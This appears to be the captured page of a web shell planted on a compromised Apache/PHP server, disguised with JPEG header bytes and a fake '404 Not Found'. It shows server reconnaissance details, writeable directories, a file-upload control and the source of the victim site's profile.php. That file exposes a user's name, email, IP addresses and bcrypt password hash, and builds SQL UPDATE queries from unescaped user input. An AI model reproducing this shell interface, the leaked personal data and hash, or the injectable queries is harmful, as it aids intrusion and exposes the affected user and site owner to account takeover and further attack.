ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/netphim/code/guest/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/netphim/code/guest/profile.php
<?php
if(!isset($ob_user->user_id) or intval($ob_user->user_id)==0){
    header('Location: /login.html');
}
if($ob_user->user_status=='locked'){
    $print->refresh('user_locked.html');
    exit();
}

$title_page = 'Profile '.$ob_user->guest_fullname;
$smarty->assign('title_page',$title_page);
$smarty->assign('des_page',str_replace('"',"'",strip_tags($arr_option['blogdescription'])));
$smarty->assign('image_page',$INFO['home_url'].$arr_option['share_image_website']);
$left_menu=left_menu();
$smarty->assign('left_menu',$left_menu);
/*stdClass Object ( [guest_id] => 5 [user_id] => 13 [openid_type] => google [openid] => 116830156749922431338 [guest_fullname] => Nguyen Ngoc Giang [guest_email] => giangnn15.nhatrang@ischool.vn [guest_avatar] => upload/user/2023/06/116830156749922431338_1687430616.webp [guest_ip] => 14.191.204.111 [guest_vip_level] => [guest_vip_levelname] => [guest_hitchap] => 6 [guest_point] => 6 [guest_level] => [user_key] => giangnn15.nhatrang@ischool.vn [user_password_default] => [user_password_hash] => $2y$12$KlE/JNWidv98lWZ7U7xn2e6rS/nimMGExNU./oom6Xj/6vDYOo.yS [user_image] => upload/user/2023/06/116830156749922431338_1687430616.webp [user_type] => guest [user_last_login] => 12/07/2023 06:41 AM [user_ip] => 14.191.76.247 [user_rule] => [user_status] => active [user_jointime] => 1687430624 [user_name] => giangnn15.nhatrang@ischool.vn [fullname] => Nguyen Ngoc Giang [from_ip] => 14.191.204.159 ) */
if(isset($_FILES['image_field']) && $_FILES['image_field']['name']!=''){
    $url_img = user_avatar($_FILES['image_field']);
    $user_id = intval($ob_user->user_id);
    if ($url_img!='') {
        @unlink($ob_user->user_image);
        @unlink($ob_user->guest_avatar);
        $DB->query("UPDATE tb_guest SET guest_avatar='$url_img' WHERE user_id='$user_id' ");
        $DB->query("UPDATE tb_user SET user_image='$url_img' WHERE user_id='$user_id' ");
        //update comment
        $DB->query("UPDATE tb_comment SET user_id_img='$url_img' WHERE user_id_post='$user_id' ");
        refresh_local_token();
        echo $url_img;
        exit();
    }
    echo 'https://c.tenor.com/k-A2Bukh1lUAAAAi/loading-loading-symbol.gif';
    exit();
}
if(isset($CORE->input['submitbt'])){
    $f = $CORE->input['f'];
    if(!empty($f['name'])){
        $user_id = intval($ob_user->user_id);
        $DB->query("UPDATE tb_guest SET guest_fullname='".trim($f['name'])."' WHERE user_id='$user_id' ");
        //update comment
        $DB->query("UPDATE tb_comment SET user_id_post_name='".trim($f['name'])."' WHERE user_id_post='$user_id' ");
        $DB->query("UPDATE tb_comment SET user_id_reply_name='".trim($f['name'])."' WHERE user_id_reply='$user_id' ");
        refresh_local_token();
        header('Location: /user/profile/');
        exit();
    }
}
?>

ZeroDay Forums Mini